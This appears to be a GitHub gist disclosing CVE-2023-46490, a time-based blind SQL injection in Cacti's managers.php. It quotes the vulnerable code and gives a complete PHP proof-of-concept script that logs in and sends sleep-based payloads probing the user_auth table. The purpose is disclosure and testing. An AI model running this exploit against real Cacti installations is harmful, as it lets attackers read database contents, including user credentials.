Skip to content

Instantly share code, notes, and snippets.

@ISHGARD-2
Created October 27, 2023 03:24
Show Gist options
  • Save ISHGARD-2/a95632111138fcd7ccf7432ccb145b53 to your computer and use it in GitHub Desktop.
Save ISHGARD-2/a95632111138fcd7ccf7432ccb145b53 to your computer and use it in GitHub Desktop.
CVE-2023-46490
Package
cacti
Affected versions
<=1.2.25
Patched versions
None
Summary
A SQL Injection vulnerability discovered in managers.php allowed authenticated users to access database information.
Details
SQL Injection vulnerability discovered in managers.php. In function form_actions(), request_var 'selected_items' is joined into into SQL statements without security checks.
source code:
function form_actions() {
global $manager_actions, $manager_notification_actions;
if (isset_request_var('selected_items')) {
if (isset_request_var('action_receivers')) {
$selected_items = cacti_unserialize(stripslashes(get_nfilter_request_var('selected_graphs_array')));
if ($selected_items != false) {
if (get_nfilter_request_var('drp_action') == '1') { // delete
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',' ,$selected_items) . ')');
db_execute('DELETE FROM snmpagent_managers_notifications WHERE manager_id IN (' . implode(',' ,$selected_items) . ')');
db_execute('DELETE FROM snmpagent_notifications_log WHERE manager_id IN (' . implode(',' ,$selected_items) . ')');
} elseif (get_nfilter_request_var('drp_action') == '2') { // enable
db_execute("UPDATE snmpagent_managers SET disabled = '' WHERE id IN (" . implode(',' ,$selected_items) . ')');
} elseif (get_nfilter_request_var('drp_action') == '3') { // disable
db_execute("UPDATE snmpagent_managers SET disabled = 'on' WHERE id IN (" . implode(',' ,$selected_items) . ')');
}
header('Location: managers.php?header=false');
exit;
}
PoC
$url = ["http://localhost/cacti/", "http://192.168.80.128/cacti/",];
$url = $url[1];
$username = 'admin';
$password = 'password';
$login = "index.php?action=login&login_username=$username&login_password=$password";
$injectSQLcode1=serialize(["1 ) or if ('admin' = (SELECT username FROM user_auth WHERE id = 1 ), sleep(5), 0"]);
$injectSQLcode2=serialize(["1 ) or if ('error' = (SELECT username FROM user_auth WHERE id = 1 ), sleep(5), 0"]);
$target = "managers.php?action=actions&selected_items=1&action_receivers=1&drp_action=1&selected_graphs_array=";
function curlPage($url, $cookie=false){
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 60);
curl_setopt($curl, CURLOPT_TIMEOUT, 60);
if($cookie){
curl_setopt($curl, CURLOPT_COOKIE,$cookie);
}
$data = curl_exec($curl);
echo "[++Debug++] ".$url."\n";
curl_close($curl);
return $data;
}
function getSQLinjectionPage(){
global $url, $login, $target, $injectSQLcode1, $injectSQLcode2;
//login
$data1 = curlPage($url.$login);
//echo $data1."\n";
//get cookie
$cookie = substr($data1, strpos($data1, 'Set-Cookie: ') + 12, 32);
echo '[++Debug++] Cacti Cookie: '.$cookie."\n";
//check login
$data2 = curlPage($url."index.php", $cookie);
//echo substr($data2, 0, 300)."\n\n";
//time of correct test
$time1 = time();
$data3 = curlPage($url.$target.urlencode($injectSQLcode1), $cookie);
$time1 = time() - $time1;
echo "[++result++] time of correct test: ".$time1."\n\n";
//time of error test
$time2 = time();
$data3 = curlPage($url.$target.urlencode($injectSQLcode2), $cookie);
$time2 = time() - $time2;
echo "[++result++] time of error test: ".$time2."\n\n";
if( $time2 <=1 and $time1 >= 5){
echo "[++result++] Time difference exist, vulnerability exsit!"."\n\n";
}else{
echo "[++result++] No time difference, vulnerability not exsit"."\n\n";
}
}
//set ip, port, username, password, InjectCode first
getSQLinjectionPage();
Impact
Although there is no echo,by measuring the time delay of accessing the website, authenticated users can obtain mysql database content.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment